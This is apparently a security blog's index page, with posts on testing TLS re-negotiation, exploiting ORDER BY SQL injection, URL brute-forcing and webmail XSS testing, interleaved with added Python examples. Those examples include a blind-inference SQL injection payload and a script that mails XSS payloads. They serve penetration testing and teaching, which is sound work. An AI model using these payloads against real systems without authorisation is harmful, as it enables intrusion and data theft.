alla's blog

Web Site is Alive Again

Our web server temporarily succumbed to bit rot. It has now been migrated to a sparkling new virtual machine, DNS has been updated, and everything seems to be ticking along as it should. Sorry for any inconvenience this may have caused.

(Really) Testing for SSL/TLS Re-negotiation

The SSL/TLS re-negotiation vulnerability (CVE-2009-3555) allows a man-in-the-middle to prepend attacker-chosen plaintext to a victim's encrypted session, which the server then processes as if it were the beginning of the victim's own request. It used to be possible to check whether a server allows insecure re-negotiation with OpenSSL s_client (see the earlier post). However, recent versions of OpenSSL disable insecure re-negotiation on the client side completely, so if you run s_client against a vulnerable target and request re-negotiation, it exits, exactly as it would if the target did not support re-negotiation at all.
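The usual first step that scanners take is the passive one: offer the RFC 5746 renegotiation_info extension in the ClientHello and see whether the server echoes it back. The script below is an added example, not the blog's own code or OpenSSL's; it builds the ClientHello by hand over a plain socket so that it does not depend on what the local OpenSSL build permits. The cipher-suite list and the hostnames are assumptions. Note the caveat this post is really about: a server that does not echo the extension may simply have re-negotiation switched off, so "absent" is a lead to follow up with a real re-negotiation attempt, not proof of the vulnerability.

```python
"""Passive check for RFC 5746 (secure renegotiation) support in a TLS server.

Added example, not the blog's own code. It hand-builds a TLS 1.2 ClientHello
carrying the renegotiation_info extension and the
TLS_EMPTY_RENEGOTIATION_INFO_SCSV, sends it over a plain socket and looks for
renegotiation_info (0xff01) among the ServerHello extensions. A server that
echoes it implements RFC 5746. One that does not may still have renegotiation
switched off entirely, so "absent" is a lead, not proof of CVE-2009-3555.
"""
import os
import socket
import struct

RENEGOTIATION_INFO = 0xFF01
SCSV = 0x00FF  # TLS_EMPTY_RENEGOTIATION_INFO_SCSV
# A handful of widely supported suites plus the SCSV (RFC 5746 allows sending both).
CIPHER_SUITES = [0xC02F, 0xC030, 0xC013, 0xC014, 0x009C, 0x002F, 0x0035, SCSV]


def _uint24(n: int) -> bytes:
    return n.to_bytes(3, "big")


def build_client_hello(server_name: str) -> bytes:
    """Return one TLS record holding a TLS 1.2 ClientHello with SNI and renegotiation_info."""
    suites = b"".join(struct.pack("!H", s) for s in CIPHER_SUITES)
    # renegotiation_info: one-byte length prefix + empty renegotiated_connection
    reneg_ext = struct.pack("!HH", RENEGOTIATION_INFO, 1) + b"\x00"
    name = server_name.encode("idna")
    name_list = struct.pack("!BH", 0, len(name)) + name  # name_type 0 = host_name
    sni_ext = struct.pack("!HHH", 0x0000, len(name_list) + 2, len(name_list)) + name_list
    exts = reneg_ext + sni_ext
    body = (b"\x03\x03" + os.urandom(32)            # client_version, random
            + b"\x00"                               # empty session_id
            + struct.pack("!H", len(suites)) + suites
            + b"\x01\x00"                           # null compression only
            + struct.pack("!H", len(exts)) + exts)
    handshake = b"\x01" + _uint24(len(body)) + body  # handshake type 1 = client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def parse_server_hello(data: bytes) -> dict:
    """Parse the first handshake message from one or more TLS records.

    Returns {"alert": (level, description)} for an alert record, otherwise
    {"version", "cipher_suite", "extensions": {ext_type: payload}}.
    """
    handshake, pos = b"", 0
    while pos + 5 <= len(data):
        ctype = data[pos]
        rlen = struct.unpack("!H", data[pos + 3:pos + 5])[0]
        payload = data[pos + 5:pos + 5 + rlen]
        if ctype == 21 and len(payload) >= 2:      # alert
            return {"alert": (payload[0], payload[1])}
        if ctype != 22:                            # not a handshake record
            raise ValueError("unexpected record type %d" % ctype)
        handshake += payload
        pos += 5 + rlen
    if len(handshake) < 4 or handshake[0] != 2:   # handshake type 2 = server_hello
        raise ValueError("no ServerHello in response")
    hello = handshake[4:4 + int.from_bytes(handshake[1:4], "big")]
    version = struct.unpack("!H", hello[:2])[0]
    p = 2 + 32                                     # skip server random
    p += 1 + hello[p]                              # skip session_id
    cipher = struct.unpack("!H", hello[p:p + 2])[0]
    p += 3                                         # cipher suite + compression method
    exts = {}
    if p + 2 <= len(hello):                        # extensions block is optional
        end = p + 2 + struct.unpack("!H", hello[p:p + 2])[0]
        p += 2
        while p + 4 <= end:
            etype, elen = struct.unpack("!HH", hello[p:p + 4])
            exts[etype] = hello[p + 4:p + 4 + elen]
            p += 4 + elen
    return {"version": version, "cipher_suite": cipher, "extensions": exts}


def advertises_secure_renegotiation(hello: dict) -> bool:
    return RENEGOTIATION_INFO in hello.get("extensions", {})


def check(host: str, port: int = 443, timeout: float = 5.0) -> dict:
    """Connect, send the ClientHello and return the parsed ServerHello (needs network)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_client_hello(host))
        data = b""
        while True:  # read until the first record is complete (ServerHello fits in it)
            need = 5 if len(data) < 5 else 5 + struct.unpack("!H", data[3:5])[0]
            if len(data) >= need:
                break
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return parse_server_hello(data)


if __name__ == "__main__":
    import sys
    result = check(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 443)
    if "alert" in result:
        print("alert level=%d description=%d" % result["alert"])
    else:
        print("cipher suite 0x%04x, renegotiation_info %s" % (
            result["cipher_suite"],
            "present" if advertises_secure_renegotiation(result) else "absent"))
```

Run it as `python3 reneg_check.py host [port]`. The ClientHello offers only TLS 1.2, so a TLS 1.3 server answers with a TLS 1.2 ServerHello and the same extension logic applies; an "absent" result still has to be confirmed by actually attempting re-negotiation with a client that is willing to do it insecurely.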

Exploiting SQL Injection in ORDER BY on Oracle

Consider the following piece of code:


$sql = "SELECT something FROM some_table WHERE id=? ORDER BY $column_name";

The WHERE clause is parametrized, but the ORDER BY is not. This happens often enough: a bound parameter can only supply a value, so ORDER BY ? would sort by a constant rather than by a column, and developers fall back to string interpolation. Assuming that $column_name comes from user input, this code is vulnerable to SQL injection.
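The following added example (not the blog's code) puts the string-built query beside an allow-listed fix and shows the primitive an attacker gets from an ORDER BY injection: make the sort column depend on an arbitrary condition and read the answer off the row order. SQLite stands in for Oracle because it runs in-process; the CASE expression used as the payload is plain SQL and behaves the same on Oracle, with both branches text columns as Oracle requires. The table, its rows and the WHERE clause (owner=? instead of id=?, so that more than one row comes back) are constructed for the demo, and sqlite3 happens to use the same ? placeholder as the fragment above (python-oracledb would use :1).

```python
"""ORDER BY injection: vulnerable string-built query beside an allow-listed fix.

Added example, not the blog's code. SQLite stands in for Oracle; the table,
rows and WHERE clause are constructed for the demo.
"""
import sqlite3
from typing import List


def build_query_vulnerable(column_name: str) -> str:
    """What the post's code does: interpolate the sort column into the SQL text."""
    return "SELECT id, name, email FROM some_table WHERE owner=? ORDER BY " + column_name


# Fix: map user-facing sort keys onto a fixed set of column identifiers. A bound
# parameter cannot do this job, because ORDER BY ? sorts by a constant, not a column.
SORTABLE_COLUMNS = {"id": "id", "name": "name", "email": "email"}


def build_query_safe(sort_key: str, descending: bool = False) -> str:
    try:
        column = SORTABLE_COLUMNS[sort_key]
    except KeyError:
        raise ValueError("unsupported sort column: %r" % sort_key) from None
    direction = "DESC" if descending else "ASC"
    return "SELECT id, name, email FROM some_table WHERE owner=? ORDER BY %s %s" % (column, direction)


def setup_demo_db() -> sqlite3.Connection:
    """In-memory table whose id, name and email orderings all differ (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE some_table (id INTEGER, name TEXT, email TEXT, owner TEXT)")
    conn.executemany("INSERT INTO some_table VALUES (?, ?, ?, ?)", [
        (1, "zed", "a@example.test", "bob"),
        (2, "mike", "b@example.test", "bob"),
        (3, "alice", "c@example.test", "bob"),
    ])
    return conn


def names_in_order(conn: sqlite3.Connection, query: str, owner: str) -> List[str]:
    return [row[1] for row in conn.execute(query, (owner,))]


def condition_is_true(conn: sqlite3.Connection, owner: str, condition_sql: str) -> bool:
    """Boolean inference through ORDER BY: sort by name when the condition holds,
    by email otherwise, then tell the two orderings apart in the result."""
    payload = "(CASE WHEN (%s) THEN name ELSE email END)" % condition_sql
    names = names_in_order(conn, build_query_vulnerable(payload), owner)
    return names == sorted(names)  # alphabetical by name => the condition held


if __name__ == "__main__":
    db = setup_demo_db()
    print("1=1 ->", condition_is_true(db, "bob", "1=1"))
    print("1=2 ->", condition_is_true(db, "bob", "1=2"))
    print("row count > 2 ->", condition_is_true(db, "bob", "(SELECT count(*) FROM some_table) > 2"))
    try:
        build_query_safe("(CASE WHEN (1=1) THEN name ELSE email END)")
    except ValueError as e:
        print("allow-list rejected the payload:", e)
```

Any subselect can go into the condition, which is what turns a sort parameter into a blind oracle over the whole schema; the allow-list closes that because the user never supplies an identifier, only a key into a table the application owns.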

Why Investing in IT Security is Bad for Your Business: A Model

Consider a simple economic model. There are N companies that make doodahs. I am going to make two assumptions about the doodah market.

1. The market for doodahs is very competitive, so the profit margins are thin - a doodah maker that has a higher cost of production quickly goes out of business. This is not a very strong assumption - most modern markets are like this.

MagicTree FAQ and Build 1487

We have started a FAQ page for MagicTree. If you have a question that should be added, please leave a comment.

We have also posted MagicTree build 1487 for download. It contains various bug fixes, in particular in XML parsing, and minor UI improvements.


MagicTree vs. Dradis

Note: this post is unfinished - two videos are missing
Correction: Dradis can do reports in Word format

Several people have noted that MagicTree is similar to Dradis. In this post I will try to make a point-by-point comparison, outlining both similarities and differences. Obviously, I have a bias: being the MagicTree developer, I know MagicTree a lot better than Dradis. Feel free to correct me or point out features that I have missed.


Video: Using MagicTree for Analysing Data

This video was going to be the first in a series of three. However, I got stuck with the second one, so instead of waiting for inspiration to strike, I thought I'd publish this one anyway. Enjoy.

Using Skipfish for Numerical URL Brute-forcing

Suppose we have a web site that stores data files in a web-accessible directory /data/ for which directory listing is disabled, and suppose the files are named /data/something_<timestamp>.txt. We want to find as many of the data files in this directory as possible. Further, let's assume that the timestamp is in "yymmddhhmmss" format.
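Before pointing any brute-forcer at such a directory it is worth generating the candidate list yourself and looking at its size. The script below is an added example, not the blog's code: it produces the something_<yymmddhhmmss>.txt names for a date window at a chosen resolution, reports the size of the search space, and can write the candidates out one URL per line for whichever tool you feed them to (skipfish's own dictionary format is not reproduced here). The prefix, suffix, base URL and date window are assumptions; the optional probe() uses HEAD requests and is the only part that touches the network.

```python
"""Candidate names for a timestamp-based URL brute-force (added example, not the blog's code).

Prefix, suffix and the date window are assumptions; the yymmddhhmmss format is the one
the post describes.
"""
import urllib.error
import urllib.request
from datetime import datetime, timedelta
from typing import Iterable, Iterator, List


def parse_ts(ts: str) -> datetime:
    """Turn a yymmddhhmmss string (e.g. from a file name you already know) back into a datetime."""
    return datetime.strptime(ts, "%y%m%d%H%M%S")


def search_space(start: datetime, end: datetime, step_seconds: int) -> int:
    """Number of candidates in [start, end) at the given resolution (0 if the window is empty)."""
    total = int((end - start).total_seconds())
    if total <= 0:
        return 0
    return -(-total // step_seconds)  # ceiling division


def candidate_names(start: datetime, end: datetime, step_seconds: int,
                    prefix: str = "something_", suffix: str = ".txt") -> Iterator[str]:
    """Yield prefix + yymmddhhmmss + suffix for every step in [start, end)."""
    t, step = start, timedelta(seconds=step_seconds)
    while t < end:
        yield "%s%s%s" % (prefix, t.strftime("%y%m%d%H%M%S"), suffix)
        t += step


def write_url_list(path: str, base_url: str, names: Iterable[str]) -> int:
    """Write one absolute URL per line; returns how many were written."""
    n = 0
    with open(path, "w") as fh:
        for name in names:
            fh.write(base_url + name + "\n")
            n += 1
    return n


def probe(base_url: str, names: Iterable[str], timeout: float = 5.0) -> List[str]:
    """HEAD each candidate and keep everything that is not a clean 404 (needs network)."""
    found = []
    for name in names:
        req = urllib.request.Request(base_url + name, method="HEAD")
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                found.append("%s %d" % (name, resp.status))
        except urllib.error.HTTPError as e:
            if e.code != 404:  # 403, 401, 500 etc. all deserve a second look
                found.append("%s %d" % (name, e.code))
        except urllib.error.URLError:
            pass
    return found


if __name__ == "__main__":
    start, end = parse_ts("110301000000"), parse_ts("110302000000")  # one day, assumed
    for step in (1, 60, 3600):
        print("one day at %5d s resolution: %6d candidates" % (step, search_space(start, end, step)))
    # Per-second over a single day is 86400 requests. Narrow the window (file names you
    # have already seen, the site's publishing schedule) before going finer than a minute.
    write_url_list("candidates.txt", "http://target.example/data/",
                   candidate_names(start, end, 60))
```

The useful trick is to run parse_ts() over every file name you already know, look at the gaps between them, and pick the resolution and window from that rather than sweeping a whole day per second.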

MagicTree Nessus version 2 XML parsing bug fix

Sébastien Damaye of aldeid.com has reported a bug in MagicTree data import from Nessus XML version 2. Build 1381 includes a corrected XSLT for Nessus XML version 2 and fixes this problem. Thanks to Sébastien for reporting it. The downloads page is updated to point to build 1381.

Webmail XSS Tester - Excess2

Here is a script to automate testing of webmail systems for cross-site scripting. It uses the XSS Cheat Sheet to generate the injection strings. Compared to the previous version, this one downloads the cheat sheet on the fly (instead of having it hard-coded) and supports SMTP authentication.
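The core of such a tester is simple: one message per payload, each tagged so that when something fires in the webmail client you know which string did it. The script below is an added example in the spirit of excess2, not the script itself: the original fetched the cheat sheet at run time, whereas here a short constructed payload list is embedded so it runs offline. SMTP host, credentials and addresses are placeholders.

```python
"""Send one tagged test mail per XSS payload to a webmail account.

Added example, not excess2 itself. The payload list is a small constructed sample
standing in for the cheat sheet; host, port, credentials and addresses are placeholders.
"""
import smtplib
import uuid
from email.message import EmailMessage
from typing import List, Optional, Sequence

PAYLOADS = [  # constructed sample, not the cheat sheet
    '<script>alert(1)</script>',
    '<img src=x onerror=alert(1)>',
    '<svg onload=alert(1)>',
    '<a href="javascript:alert(1)">click</a>',
    '<div style="background:url(javascript:alert(1))">x</div>',
]


def build_messages(sender: str, recipient: str,
                   payloads: Sequence[str] = PAYLOADS) -> List[EmailMessage]:
    """One multipart/alternative message per payload, each with a unique tag."""
    msgs = []
    for i, payload in enumerate(payloads):
        tag = "excess-%02d-%s" % (i, uuid.uuid4().hex[:8])
        msg = EmailMessage()
        msg["From"] = sender
        msg["To"] = recipient
        msg["Subject"] = "XSS test %s" % tag
        msg["X-XSS-Test"] = tag
        # The text part only identifies the test; the payload lives in the HTML part,
        # which is what the webmail client renders.
        msg.set_content("Test %s; payload: %s" % (tag, payload))
        msg.add_alternative("<html><body><p>%s</p>%s</body></html>" % (tag, payload),
                            subtype="html")
        msgs.append(msg)
    return msgs


def send_all(host: str, port: int, user: Optional[str], password: Optional[str],
             messages: Sequence[EmailMessage], use_starttls: bool = True) -> int:
    """Deliver the messages over one SMTP session, authenticating if credentials are given."""
    with smtplib.SMTP(host, port) as smtp:
        smtp.ehlo()
        if use_starttls:
            smtp.starttls()
            smtp.ehlo()
        if user:
            smtp.login(user, password or "")
        for msg in messages:
            smtp.send_message(msg)
    return len(messages)


if __name__ == "__main__":
    batch = build_messages("tester@example.test", "victim@webmail.example.test")
    for m in batch:
        print(m["Subject"])
    # send_all("smtp.example.test", 587, "tester", "secret", batch)  # placeholders
```

When a payload fires, the tag in the page (or in the Subject) identifies it. The HTML body is only one rendering point; the display name in From, attachment file names and the Subject itself are worth the same treatment, with the tag kept somewhere the payload cannot mangle.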

NAME
       excess2 - A script for testing webmail systems for cross-site scripting
       problems

DESCRIPTION
